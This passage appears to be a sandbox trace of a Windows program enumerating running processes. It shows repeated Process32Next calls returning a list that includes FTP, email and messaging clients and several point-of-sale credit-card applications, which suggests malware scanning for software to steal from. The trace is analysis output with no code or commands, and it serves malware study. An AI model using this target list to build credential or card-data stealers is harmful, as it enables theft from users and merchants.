th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0277.706] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0277.708] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0277.709] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0277.710] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0277.712] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0277.713] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0277.755] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0277.757] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0277.759] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0277.760] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0277.765] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0277.766] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0277.768] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0277.769] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0277.771] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0277.772] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0277.774] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0277.775] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0277.777] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0277.781] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0277.783] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0277.784] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0277.786] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0277.787] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0277.789] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0277.791] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0277.809] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0277.815] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0277.817] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0277.819] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0277.821] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0277.824] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0277.830] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0277.832] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0277.834] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0277.836] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0277.839] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0277.844] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0277.846] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0277.848] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0277.850] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0277.853] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0277.855] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0277.909] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0277.911] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0277.913] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0277.916] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0277.918] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0277.923] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0277.925] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0277.927] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0277.929] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0277.931] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0277.937] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0277.939] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0277.941] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0277.943] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0277.945] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0277.947] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0278.001] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0278.004] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0278.006] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0278.008] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0278.010] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0278.016] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0278.018] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0278.020] CloseHandle (hObject=0x9e0) returned 1 [0278.020] Sleep (dwMilliseconds=0x64) [0278.159] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0278.177] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.179] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0278.181] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0278.183] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0278.188] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0278.190] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0278.192] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0278.194] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0278.196] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0278.198] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.253] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.255] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0278.257] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.259] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.261] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.266] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, 